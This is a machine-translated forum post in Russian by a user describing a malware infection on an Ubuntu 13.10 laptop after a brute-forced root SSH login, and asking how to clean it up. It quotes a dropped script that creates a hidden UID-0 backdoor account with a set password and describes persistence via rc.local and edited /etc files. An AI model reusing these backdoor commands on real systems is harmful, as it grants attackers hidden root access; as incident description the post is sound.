Я вполне уверен, что мой ноутбук Ubuntu 13.10 заражен каким-то вредоносным ПО.
Время от времени я обнаруживаю, что процесс / lib / sshd (принадлежит root) работает и потребляет много процессора. Это не сервер sshd, который запускает / usr / sbin / sshd.
У двоичного файла есть разрешения --wxrw-rwt, и он генерирует и запускает скрипты в каталоге / lib. Последний из них называется 13959730401387633604, и он выполняет следующие действия
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
Пользователь gusr был создан вредоносным ПО независимо, а затем chpasswd зависает, потребляя 100% -ный процессор.
До сих пор я обнаружил, что пользователь gusr был добавлен к файлам в файле / etc /
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Кажется, что вредоносное ПО сделало копии всех этих файлов с помощью "-" суффикс. Полный список файлов / etc / files, которые были изменены root, доступен здесь.
Кроме того, файл / etc / hosts был изменен на здесь .
/ lib / sshd начинается с добавления в конец файла /etc/init.d/rc.local!
Я удалил пользователя, удалил файлы, убил дерево обработал, изменил мои passwors и удалил открытые ключи ssh.
Я знаю, что я в основном ввернут, и я, скорее всего, переустановит всю систему. Тем не менее, поскольку я заходил на несколько других машин, было бы неплохо хотя бы попытаться удалить его и выяснить, как я его получил. Любые предложения о том, как это сделать, будут оценены.
Кажется, что они попали 25 марта путем принудительного входа root. Я не знал, что root ssh включен по умолчанию в Ubuntu. Я отключил его и установил denyhosts.
Вход был из 59.188.247.236, где-то в Гонконге.
Я получил ноутбук от EmperorLinux, и они разрешили доступ root. Если у вас есть один из них, и вы запускаете sshd, остерегайтесь.